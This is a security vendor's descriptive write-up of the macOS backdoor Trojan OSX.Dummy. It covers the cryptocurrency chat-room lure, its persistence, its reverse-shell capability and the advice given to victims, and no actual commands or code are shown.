OSX.Dummy
OSX.Dummy is a backdoor Trojan that lets a threat actor control your PC remotely. Its campaign is targeting victims through cryptocurrency-themed chat rooms and channels, and tricking them into running threatening commands for installing the Trojan. Users should let their anti-malware products delete OSX.Dummy as soon as possible, change any compromised passwords and avoid entering terminal commands without fully understanding the consequences.
Who's the Dummy in this Computer-Hijacking Situation
Con artists come in more flavors than just goods-hawking vendors in a street marketplace. Cryptocurrency industry financiers should, already, know of the relationship that financial technology has to such cons. For those who require a more concrete demonstration, the backdoor Trojan, OSX.Dummy provides one.
The 'origin story' for OSX.Dummy involves a threat actor circulating conversations in online socialization platforms like Discord and Slack. The con artist solicits a cryptocurrency transaction, such as a Bitcoin purchase, and asks that the victim 'make sure the port is open' for the transfer. Since port settings are a frequent obstacle with programs that require network access, even including simple, recreational software like video games, this line is somewhat believable.
However, the threat actor's copy-pasted terminal line command doesn't open a port but runs a script. This exploit bypasses OS X defenses like Gatekeeper and XProtect, which overlook terminal-downloaded files. OSX.Dummy gains system persistence shortly afterward and makes the Apple computer into a 'dummy' that OSX.Dummy's attacker can control through remote commands.
Smartening Up against Chatty Robbers
OSX.Dummy is a threat of great self-contradiction. Thanks to its static libraries, the first-stage downloaded file is over thirty megabytes. However, malware experts deem the Trojan itself, as being surprisingly limited in its functionality. Although it includes a rootkit style of system persistence, collects the user's terminal password during the setup routine, and offers the attacker reverse shell access for issuing commands, it has no exceptional, additional features.
Still, a sufficiently cunning attacker could use this accessibility for delivering other threats, deleting files, changing settings or collecting information. The latter is, most probably, OSX.Dummy's goal, since its victims are cryptocurrency users. This demographic offers a self-evident monetization option for threat actors who can collect wallet credentials, along with their contents.
Users of all operating systems should familiarize the impact of various system commands before entering them into a terminal or command prompt style interface.
The command that victims type out before infecting themselves doesn't resemble one for opening a port or interacting with firewall software or related settings. When users trust strangers on what unknown words mean to their PCs, it seems only appropriate that those 'magic words' end up being a hex with less than happy consequences, like the backdoor Trojan, OSX.Dummy.
Leave a Reply
Please note that we are not able to assist with billing and support issues regarding SpyHunter or other products. If you're having issues with SpyHunter, please get in touch with SpyHunter customer support through your SpyHunter . If you have SpyHunter billing questions, we recommend you check the Billing FAQ. For general suggestions or feedback, contact us.